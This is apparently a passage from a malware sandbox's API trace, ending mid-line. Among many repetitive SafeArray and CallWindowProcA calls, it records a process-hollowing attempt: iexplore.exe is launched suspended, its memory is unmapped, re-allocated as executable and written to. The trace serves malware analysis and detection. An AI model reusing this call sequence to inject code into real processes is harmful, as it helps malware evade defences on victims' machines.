[0195.480] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f644 | out: ppsaOut=0x18f644) returned 0x0 [0195.481] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.481] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f644 | out: ppsaOut=0x18f644) returned 0x0 [0195.481] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.481] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x0 [0195.481] NtWriteVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x18f778, Buffer=0x3814270*, NumberOfBytesToWrite=0x2, NumberOfBytesWritten=0x0 | out: Buffer=0x3814270*, NumberOfBytesWritten=0x0) returned 0x0 [0195.481] GetLastError () returned 0x578 [0195.481] SafeArrayDestroyDescriptor (psa=0x5e3118) returned 0x0 [0195.481] VarAdd (in: pvarLeft=0x4070a0, pvarRight=0x18f8d4, pvarResult=0x18f8c4 | out: pvarResult=0x18f8c4) returned 0x0 [0195.481] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f770 | out: ppsaOut=0x18f770) returned 0x0 [0195.481] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f640 | out: ppsaOut=0x18f640) returned 0x0 [0195.481] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.481] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f640 | out: ppsaOut=0x18f640) returned 0x0 [0195.481] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.481] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f640 | out: ppsaOut=0x18f640) returned 0x0 [0195.481] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.481] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f640 | out: ppsaOut=0x18f640) returned 0x0 [0195.482] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.482] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f640 | out: ppsaOut=0x18f640) returned 0x0 [0195.482] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.482] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f640 | out: ppsaOut=0x18f640) returned 0x0 [0195.482] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.482] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x0 [0195.482] NtWriteVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x18f774, Buffer=0x38142ac*, NumberOfBytesToWrite=0x4, NumberOfBytesWritten=0x0 | out: Buffer=0x38142ac*, NumberOfBytesWritten=0x0) returned 0x0 [0195.482] GetLastError () returned 0x578 [0195.482] SafeArrayDestroyDescriptor (psa=0x5e3118) returned 0x0 [0195.482] VarAdd (in: pvarLeft=0x4070a0, pvarRight=0x18f8b4, pvarResult=0x18f8a4 | out: pvarResult=0x18f8a4) returned 0x0 [0195.482] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f774 | out: ppsaOut=0x18f774) returned 0x0 [0195.482] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f644 | out: ppsaOut=0x18f644) returned 0x0 [0195.482] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.482] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f644 | out: ppsaOut=0x18f644) returned 0x0 [0195.482] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.482] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f644 | out: ppsaOut=0x18f644) returned 0x0 [0195.482] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.482] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f644 | out: ppsaOut=0x18f644) returned 0x0 [0195.483] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.483] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f644 | out: ppsaOut=0x18f644) returned 0x0 [0195.483] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.483] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f644 | out: ppsaOut=0x18f644) returned 0x0 [0195.483] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.483] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x0 [0195.483] NtWriteVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x18f778, Buffer=0x3814320*, NumberOfBytesToWrite=0x4, NumberOfBytesWritten=0x0 | out: Buffer=0x3814320*, NumberOfBytesWritten=0x0) returned 0x0 [0195.483] GetLastError () returned 0x578 [0195.483] SafeArrayDestroyDescriptor (psa=0x5e3118) returned 0x0 [0195.483] VarAdd (in: pvarLeft=0x4070b0, pvarRight=0x18f8d4, pvarResult=0x18f8c4 | out: pvarResult=0x18f8c4) returned 0x0 [0195.483] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f774 | out: ppsaOut=0x18f774) returned 0x0 [0195.483] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f644 | out: ppsaOut=0x18f644) returned 0x0 [0195.483] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.483] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f644 | out: ppsaOut=0x18f644) returned 0x0 [0195.483] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.483] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f644 | out: ppsaOut=0x18f644) returned 0x0 [0195.483] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.483] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f644 | out: ppsaOut=0x18f644) returned 0x0 [0195.483] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.483] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f644 | out: ppsaOut=0x18f644) returned 0x0 [0195.484] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.484] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f644 | out: ppsaOut=0x18f644) returned 0x0 [0195.484] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.484] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x0 [0195.484] NtWriteVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x18f778, Buffer=0x3814354*, NumberOfBytesToWrite=0x4, NumberOfBytesWritten=0x0 | out: Buffer=0x3814354*, NumberOfBytesWritten=0x0) returned 0x0 [0195.484] GetLastError () returned 0x578 [0195.484] SafeArrayDestroyDescriptor (psa=0x5e3118) returned 0x0 [0195.484] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f8a0 | out: ppsaOut=0x18f8a0) returned 0x0 [0195.484] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f734 | out: ppsaOut=0x18f734) returned 0x0 [0195.484] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.484] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f734 | out: ppsaOut=0x18f734) returned 0x0 [0195.484] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.484] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f734 | out: ppsaOut=0x18f734) returned 0x0 [0195.484] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.484] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f734 | out: ppsaOut=0x18f734) returned 0x0 [0195.484] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.485] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f734 | out: ppsaOut=0x18f734) returned 0x0 [0195.485] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.485] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f734 | out: ppsaOut=0x18f734) returned 0x0 [0195.485] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.485] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f734 | out: ppsaOut=0x18f734) returned 0x0 [0195.485] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.485] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f734 | out: ppsaOut=0x18f734) returned 0x0 [0195.485] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.485] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f734 | out: ppsaOut=0x18f734) returned 0x0 [0195.485] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.485] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f734 | out: ppsaOut=0x18f734) returned 0x0 [0195.485] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.485] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f734 | out: ppsaOut=0x18f734) returned 0x0 [0195.485] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.485] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x1 [0195.485] CreateProcessW (in: lpApplicationName="C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", lpCommandLine=" C:\\Users\\aETAdzjz\\AppData\\Roaming\\DOCUMENT\\Document.exe", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x5da078*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x5dcfc0 | out: lpCommandLine=" C:\\Users\\aETAdzjz\\AppData\\Roaming\\DOCUMENT\\Document.exe", lpProcessInformation=0x5dcfc0*(hProcess=0x100, hThread=0xfc, dwProcessId=0xabc, dwThreadId=0xad8)) returned 1 [0195.784] GetLastError () returned 0x715 [0195.784] SafeArrayDestroyDescriptor (psa=0x5e3118) returned 0x0 [0195.784] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f8a0 | out: ppsaOut=0x18f8a0) returned 0x0 [0195.785] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f734 | out: ppsaOut=0x18f734) returned 0x0 [0195.785] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.785] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f734 | out: ppsaOut=0x18f734) returned 0x0 [0195.785] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.785] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f734 | out: ppsaOut=0x18f734) returned 0x0 [0195.785] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.785] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0xc0000019 [0195.785] NtUnmapViewOfSection (ProcessHandle=0x100, BaseAddress=0x400000) returned 0xc0000019 [0195.785] GetLastError () returned 0x578 [0195.785] SafeArrayDestroyDescriptor (psa=0x5e3118) returned 0x0 [0195.785] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f8a0 | out: ppsaOut=0x18f8a0) returned 0x0 [0195.786] VarAdd (in: pvarLeft=0x4070b0, pvarRight=0x18f8d4, pvarResult=0x18f8c4 | out: pvarResult=0x18f8c4) returned 0x0 [0195.786] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f774 | out: ppsaOut=0x18f774) returned 0x0 [0195.786] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f644 | out: ppsaOut=0x18f644) returned 0x0 [0195.786] SafeArrayDestroyDescriptor (psa=0x68e8d0) returned 0x0 [0195.786] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f644 | out: ppsaOut=0x18f644) returned 0x0 [0195.786] SafeArrayDestroyDescriptor (psa=0x68e8d0) returned 0x0 [0195.786] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f644 | out: ppsaOut=0x18f644) returned 0x0 [0195.786] SafeArrayDestroyDescriptor (psa=0x68e8d0) returned 0x0 [0195.786] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f644 | out: ppsaOut=0x18f644) returned 0x0 [0195.786] SafeArrayDestroyDescriptor (psa=0x68e8d0) returned 0x0 [0195.786] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f644 | out: ppsaOut=0x18f644) returned 0x0 [0195.786] SafeArrayDestroyDescriptor (psa=0x68e8d0) returned 0x0 [0195.786] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f644 | out: ppsaOut=0x18f644) returned 0x0 [0195.786] SafeArrayDestroyDescriptor (psa=0x68e8d0) returned 0x0 [0195.786] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x0 [0195.786] NtWriteVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x18f778, Buffer=0x3814370*, NumberOfBytesToWrite=0x4, NumberOfBytesWritten=0x0 | out: Buffer=0x3814370*, NumberOfBytesWritten=0x0) returned 0x0 [0195.787] GetLastError () returned 0x578 [0195.787] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.787] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f734 | out: ppsaOut=0x18f734) returned 0x0 [0195.787] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.787] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f734 | out: ppsaOut=0x18f734) returned 0x0 [0195.787] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.787] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f734 | out: ppsaOut=0x18f734) returned 0x0 [0195.787] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.787] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f734 | out: ppsaOut=0x18f734) returned 0x0 [0195.787] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.787] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f734 | out: ppsaOut=0x18f734) returned 0x0 [0195.787] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.787] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f734 | out: ppsaOut=0x18f734) returned 0x0 [0195.787] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.787] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f734 | out: ppsaOut=0x18f734) returned 0x0 [0195.788] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.788] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0xc0000018 [0195.788] NtAllocateVirtualMemory (in: ProcessHandle=0x100, BaseAddress=0x4070c0*=0x400000, ZeroBits=0x0, RegionSize=0x18f8e4*=0x43000, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x4070c0*=0x400000, RegionSize=0x18f8e4*=0x43000) returned 0xc0000018 [0195.788] GetLastError () returned 0x578 [0195.788] SafeArrayDestroyDescriptor (psa=0x5e3118) returned 0x0 [0195.788] VarAdd (in: pvarLeft=0x4070b0, pvarRight=0x18f8d4, pvarResult=0x18f8c4 | out: pvarResult=0x18f8c4) returned 0x0 [0195.788] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f774 | out: ppsaOut=0x18f774) returned 0x0 [0195.788] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f644 | out: ppsaOut=0x18f644) returned 0x0 [0195.788] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.788] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f644 | out: ppsaOut=0x18f644) returned 0x0 [0195.788] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.788] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f644 | out: ppsaOut=0x18f644) returned 0x0 [0195.789] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.789] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f644 | out: ppsaOut=0x18f644) returned 0x0 [0195.789] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.789] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f644 | out: ppsaOut=0x18f644) returned 0x0 [0195.789] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.789] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f644 | out: ppsaOut=0x18f644) returned 0x0 [0195.789] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.789] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x0 [0195.789] NtWriteVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x18f778, Buffer=0x3814374*, NumberOfBytesToWrite=0x4, NumberOfBytesWritten=0x0 | out: Buffer=0x3814374*, NumberOfBytesWritten=0x0) returned 0x0 [0195.789] GetLastError () returned 0x578 [0195.789] SafeArrayDestroyDescriptor (psa=0x5e3118) returned 0x0 [0195.789] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f774 | out: ppsaOut=0x18f774) returned 0x0 [0195.789] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f644 | out: ppsaOut=0x18f644) returned 0x0 [0195.789] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.790] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f644 | out: ppsaOut=0x18f644) returned 0x0 [0195.790] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.790] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f644 | out: ppsaOut=0x18f644) returned 0x0 [0195.790] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.790] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f644 | out: ppsaOut=0x18f644) returned 0x0 [0195.790] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.790] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f644 | out: ppsaOut=0x18f644) returned 0x0 [0195.790] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.790] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f644 | out: ppsaOut=0x18f644) returned 0x0 [0195.790] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.790] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0xc0000005 [0195.790] NtWriteVirtualMemory (in: ProcessHandle=0x100, BaseAddress=0x400000, Buffer=0x3814270, NumberOfBytesToWrite=0x1000, NumberOfBytesWritten=0x0 | out: NumberOfBytesWritten=0x0) returned 0xc0000005 [0195.790] GetLastError () returned 0x578 [0195.790] SafeArrayDestroyDescriptor (psa=0x5e3118) returned 0x0 [0195.790] VarAdd (in: pvarLeft=0x4070b0, pvarRight=0x18f8d4, pvarResult=0x18f8c4 | out: pvarResult=0x18f8c4) returned 0x0 [0195.790] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f774 | out: ppsaOut=0x18f774) returned 0x0 [0195.791] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f644 | out: ppsaOut=0x18f644) returned 0x0 [0195.791] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.791] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f644 | out: ppsaOut=0x18f644) returned 0x0 [0195.791] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.791] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f644 | out: ppsaOut=0x18f644) returned 0x0 [0195.791] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.791] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f644 | out: ppsaOut=0x18f644) returned 0x0 [0195.791] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.791] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f644 | out: ppsaOut=0x18f644) returned 0x0 [0195.791] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.791] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f644 | out: ppsaOut=0x18f644) returned 0x0 [0195.791] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.791] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x0 [0195.791] NtWriteVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x18f778, Buffer=0x3814326*, NumberOfBytesToWrite=0x2, NumberOfBytesWritten=0x0 | out: Buffer=0x3814326*, NumberOfBytesWritten=0x0) returned 0x0 [0195.791] GetLastError () returned 0x578 [0195.791] SafeArrayDestroyDescriptor (psa=0x5e3118) returned 0x0 [0195.791] VarAdd (in: pvarLeft=0x4070b0, pvarRight=0x18f760, pvarResult=0x18f750 | out: pvarResult=0x18f750) returned 0x0 [0195.791] VarAdd (in: pvarLeft=0x18f750, pvarRight=0x18f740, pvarResult=0x18f730 | out: pvarResult=0x18f730) returned 0x0 [0195.791] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f67c | out: ppsaOut=0x18f67c) returned 0x0 [0195.792] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0195.792] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.792] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0195.792] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.792] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0195.792] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.792] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0195.792] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.792] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0195.792] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.792] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0195.792] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.792] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x0 [0195.792] NtWriteVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x18f680, Buffer=0x3814424*, NumberOfBytesToWrite=0x4, NumberOfBytesWritten=0x0 | out: Buffer=0x3814424*, NumberOfBytesWritten=0x0) returned 0x0 [0195.792] GetLastError () returned 0x578 [0195.792] SafeArrayDestroyDescriptor (psa=0x5e3118) returned 0x0 [0195.792] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f67c | out: ppsaOut=0x18f67c) returned 0x0 [0195.792] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0195.793] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.793] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0195.793] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.793] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0195.793] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.793] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0195.793] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.793] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0195.793] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.793] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0195.793] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.793] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x0 [0195.793] NtWriteVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x18f680, Buffer=0x381442c*, NumberOfBytesToWrite=0x4, NumberOfBytesWritten=0x0 | out: Buffer=0x381442c*, NumberOfBytesWritten=0x0) returned 0x0 [0195.793] GetLastError () returned 0x578 [0195.793] SafeArrayDestroyDescriptor (psa=0x5e3118) returned 0x0 [0195.793] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f67c | out: ppsaOut=0x18f67c) returned 0x0 [0195.793] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0195.793] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.793] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0195.794] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.794] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0195.794] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.794] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0195.794] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.794] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0195.794] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.794] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0195.794] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.794] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, 